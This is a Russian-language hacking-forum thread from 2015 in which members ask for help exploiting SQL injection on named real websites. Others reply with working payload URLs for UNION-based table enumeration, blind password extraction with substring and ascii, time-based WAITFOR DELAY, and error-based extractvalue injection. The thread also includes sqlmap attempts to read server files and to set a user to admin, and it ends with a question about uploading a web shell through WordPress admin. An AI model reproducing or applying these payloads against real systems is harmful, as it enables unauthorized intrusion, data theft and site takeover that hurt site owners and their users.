Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Создал на Денвере таблицу users где есть id и username
    Пишет ошибку:
    Сам запрос:
    Где почитать можно подробнее?
    Mysql символ " не совсем хорошо понимает!
     
    #41 sunnyfruit, 11 May 2015
    Last edited: 11 May 2015
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Не " , а ' .
     
    _________________________
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Code:
    http://www.freelin-wade.com/search.php?cmd=search&words=kkk%27
    помогите раскрутить
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    боюсь, не выйдет. и запроса все вырезается и экранируется. можно бы было попробовать, если бы можно было внедриться в 2 поля
     
    _________________________
    Br@!ns likes this.
  5. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    PHP:
    http://psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,2,3,4+--+
    http://psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,table_name,3,4+from+information_schema.tables+--+
     
    _________________________
    yarbabin likes this.
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Почему при ручной эксплуатации blind sql, запросы:
    Code:
    or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
    or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
    Будут одинаково TRUE? PS 0x64='d' 0x44='D'

    Как в таком случае определить в каком регистре буква в пароле?
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    используйте ascii()
     
    _________________________
    Br@!ns likes this.
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Можно ли как нибудь проверить полученный результат с помощью этойфункции, или же он работает только с одним символом? пример:
    нужно проверить итоговую сумму в выражении, чтоб не ошибиться с регистром
    Code:
    ascii(substring((select+password+from+users+where+id=1+limit+0,1),8,2))=0x4453+--+
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ascii() переводит только 1 символ, смотрите в документации
     
    _________________________
  11. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Имеется сайт с sql-injections, но возникли впоросы с sqlmap
    Code:
    [Linux Debian] [Apache 2.4.10] [MySQL 5.0] ['10.0.16-MariaDB-1']
    Privilege: USAGE
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: http://site.com/news.html?id=(SELECT 1582 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1582=1582,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat=main
    Не работает --file-read="/home/www/wwuser/user/www/index.php" (или тот же .htaccess, js не важно)
    Выдает пустой файл:
    Code:
    [WARNING] reflective value(s) found and filtering out
    [INFO] retrieved:
    [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
    files saved to [1]:
    [*] C:\sqlmap\output\site.com\files\_home_www_wwuser_user_www_index.php (size differs from remote file)

    И тот же вопрос по --sql-query="UPDATE users SET admin=1 WHERE login=test" (как только не пробовал)
    Code:
    [WARNING] execution of custom SQL queries is only available when stacked queries are supported
    UPDATE UPDATE users SET admin=1 WHERE login=test:        None
    [INFO] fetched data logged to text files under 'C:\sqlmap\output\site.com\'

    Это из-за нехватки прав? Или что то другое мешает?
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    ну как бы для чтения файлов у вашего пользователя должны быть права file_priv, а для update в mysql нужна sqli в update. тут разделяются запросы на выборку и на изменение информации
     
    _________________________
    kacergei likes this.
  13. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    Доброго дня...

    Есть LFI подскажет кто?

    HTML:
    goo.gl/d1mQnC
     
  14. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993'
    помогите с раскруткой
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.scalarchives.com/web/ricerca_risultati.asp?SC_PROV=COLL&IdCollection=82993%27;WAITFOR%20DELAY%20%270:0:1%27--
     
    _________________________
  16. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Incorrect syntax near '; WAITFOR DELAY'.
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    тем не менее, задержка есть. попробуйте 0 и 1
     
    _________________________
  18. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://o53xo.nbqweyjomnua.cmle.ru/?id_mitteilungeneintraege=-77+and%28extractvalue%281,/*!concat*/%280x3a,%28select+table_name+from+information_schema.tables+limit+1,1%29%29%29%29&typ=4
    реакция на связку union select from. select from пропускает, поэтому здесь подходит error-based
     
    _________________________
    BigBear, frank and DezMond™ like this.
  20. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Какие способы заливки шелла через wpadmin, если там а) отключено редактирование тем и плагинов б) невозможно загружать php ?